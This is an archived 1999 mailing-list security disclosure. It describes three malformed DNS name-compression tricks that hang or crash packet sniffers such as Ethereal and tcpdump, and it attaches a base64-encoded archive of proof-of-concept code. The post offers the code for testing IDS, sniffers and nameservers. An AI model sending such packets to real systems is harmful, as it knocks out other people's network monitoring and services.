This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. ---1463811696-492060995-928071178=:9647 Content-Type: TEXT/PLAIN; charset=US-ASCII keywords: some dns packet decoders (sniffers, ids systems (?), dns servers) may be vulnerable to malformed compressed domain names inside dns packets. sorry aleph1, if this has already been known or posted =) hi, as I played with the DNS RFC (1035 especially) i came up with the idea to create malformed compressed dns domains inside the DNS packet to make it impossible for the DNS packet decoder to decompress it, which might lead to a denial of service attack. On my tests I found my BIND servers resisting all attacks (three different types), but all sniffers I used to view the DNS packets send to the server behaved in a very "special" way. First test (pointing-to-itself-compression (zlip-1.c)) The DNS domain consists out of multiple labels, and message "compression" allows you to let a pointer point to a previous label inside the packet, to save bytes in the DNS packet. I just created a pointer that points to itself, meaning on a recursive domain decompression (like etherreal uses), this will produce effects like segfaulting or hanging. Etherreal alloc's memory until the system crashes, tcpdump stopped working before the packet is received, on SIGINT, it displays the malformed packet, but dropped all other packets: 14:57:59.025013 128.75.9.2.48078 > victim.ns.org.domain: 30993 Type49159 (Class 49168)? Second test (crossreferencing pointers (zlip-2.c)) Similar to the first code, but now two pointer are used to reference each other, speeding up the effect on Etherreal. Results are the same as in the first test. Third test (very long label, decompressed multiple times (zlip-3.c)) This time I used a long label (maximum of 63 characters), and referenced to it a dozend times, this will decode to a very long domain, therefore it may overflow some fixed-sized-buffers (because the rfc says "limited to 500 characters" some programmers may prefer fixed buffers for dns decoders). This is the case in Etherreal, where such a request creates a segmentation fault (due to a buffer overrun). I just tested this with BIND as nameserver, which resisted all this tests, but I included the "exploit" code in this email to allow you to test your IDS, sniffers and nameservers against this. cu, scut -- - scutat_private-berlin.de - http://nb.in-berlin.de/scut/ - sacbuctd@ircnet -- -- you don't need a lot of people to be great, you need a few great to be -- -- the best ----------------------------------------------------------------- ---1463811696-492060995-928071178=:9647 Content-Type: APPLICATION/x-gunzip; name="zlip.tar.gz" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.05.9905301532580.9647at_private-berlin.de> Content-Description: zlip.tar.gz Content-Disposition: attachment; filename="zlip.tar.gz" H4sIANNVezcAA+1abW/TSBDmq/0r5npCl5S0OC9NBKUgBJyuEgLUgjgJULSx 14mF4zW766btwX+/Z9d2m5a0SSnlRdqnpOt9G8/O7szO03CcJvlGezO8dYNo B0G/16NbZBCcK4l6/UGHqD/o9vu9rc5gQNQOelu9WxTcpFI1CqWZJLolhdCX jVvW/5vi7jod4wjQBmVsyiOKeJawlERMisuDJOTEtGbhR+XTOv7RvXvBVjfA 8FgUWUQMH36YpyLRmDw6IhUWmu6S5kpUM/QkURQnKSeUmcgoL0ZpEkLER85z SjRpQUeikIqncTVHoYpXj5iCVOhSRPmdiGm2GVIsxZSkKDT/S1GajDKuMeOu 7/+ZZGFaRJweKB0lYnPycK6pHGja/CTT/pQlGTXwREyOwxaFE5yB9XVUDpr+ f76HHk+J8CN6tn2vGKYiG3tKhsMkb1GkNErbriZCatuRS007FJS9qNhuI9Zb HxXxXO0Tqhi59v4wDN4fBmFVDsqyHVRlVe9U9c5gzfc8r5rVrVrjGCU+QTD3 adfl2na5EPPGocI7O91t3/dyicaYGmsr7fv7bK1p5GCCMRX9sUO9JsFEp3Le Z4ViY36fbivYXoZJ/tCWOWyDJxgELZDTMsY+eBd8MAI9foidbzz7d/f18O/H u8/f7D0zzV+gYGlngsLlrg2NhkOJE5UecKvGwbv2hxYFZsKp7RvVdjShuUiq cR37snLHLpfYrSVWG4jBW9ZeZumVSjvYYfr8uToBtnrOFkl2wNIkInWUaXZY Ge/CtZro53vlgQhZmoqQGu0WNd48fTX8h+7Qblk8fbFvy3Ijm/V+2Hk79OLN 8+eVFlxKIaHFC0FTPhXyCF4qKcc2cn25Jr5XWUZxHmH5xq8bTbN84wZQT+Q8 G0o2G5p6Y/fVq72Xr18O9x6/tWKtjezAHdpof62N6VumQmmMSo1RkaSRsXHD q41x1gotD5ErFJnmcGKVHHMTA+AhXtDyTJcW6lwLduV+k0Z61qLZhGmKBFfU 6XVgKpbRo3OjY8nGdVO/V8nUad1UGwDKWU1UMcql0CIUJ0OqcGFnqlyImNF2 s+4sT1DZCW/TyZQyRVhv1W82tezN2VEqGCJtKjmLjhBOuTy/WIXjXDfBOs1t 22ptSAh05QFAPY65tLHyrJkRXWHnxokr2WP9qPaVMdf1gXi1V7T7TbpP1dBy 6WWsNt4+v7q6e6tLhSpwuI++Xlu9f1dYW+UVWOLJClmssSzYbgIhCxcYwbYN 76L1WDXNEJyQBlSgmE1FoUhk3JyYWh1E1cDoVGqlIYDJiD4VXJ6srF13t8+2 n0zLBG5MNeNSLewqNAJYoplOEJaSDM47xTOuzEWDoygxfQjaC0YaJ6kHV/s+ S/TEWJimLDXj+Tnla78qJ5Vd8451anwU1imrczaDykZdXOMXn7RI4P7jyCOK qY1cLZp3IVrs5DYAhYg+9hU2HJS3shVweZSsgmRID5YMPBvAT940gztzhBFB KVcKqQ1Smiqef5m7REMxzVOO5KdVzbgdlWNNVlN7No6wuVW5tLdgaJcVS86t JWxNcl3IzKhrIyi8bz5AwuNsdf/NkyfP9vcxAxH7++R/JgnY6PzU/H8r6AR1 /j/od9o2/++6/P+HwOX/S/L/FiU3TAH4WSrwO1CArW+hAPTA3KuZdlzAcYGV uIBRuJHghXOb2MMmUkIPKUCxsVGKvzZpWMAarkgbFvGGRcRhFeZwOXVYyh1W JQ+LMuwV6cMN84clBGJVBnHRAlflEN+fRKzEIi6kEZfxiKsRiSswiW+hEku5 xLeSieuziWvQiavwiasRCsMork0pbOT+RViFw+8Cy/+6P5f/dYJuxf+2gvag 4n8dx/9+BBz/+5n8r8uNdVLOkXhqxP/xLEnTUDI1MQZJEySO/DTU46pVheQT dvJz7kukcJ4hnrZet1wmNQi+4plYDTSnxqf6KnKU01FORzkd5XSU01FORzkd 5XSU89eAScc24YI3+Y4l/I/6nX7N/zr9QWD4X7/jvv/7IfDHIaiYKEngcfWf QWnjLS4/2kgNufLrVo9nkYkjLVyciBtgKyY6JNrwNqQmyqTjyOhNLEFuq0xA j1M2a5mky1ySuC5TsuSGG+aWFYd+/e1zLRrdAr8lR/jlWWhegfxnoexLxBI/ APeImTIX7HYTA3WYR8U0x+0nckUzIT9CtF//7cMLIcOuh9GBuTcM10PWZVmi noBsjic0LVIwivScFpAN8mLuJXvjT0DjTJwE1xibyea2tk9GW2EoXCpmik70 NqaEnBHEViya4dmFRAcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcH BweHVfA/AO315gBQAAA= ---1463811696-492060995-928071178=:9647--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:47:57 PDT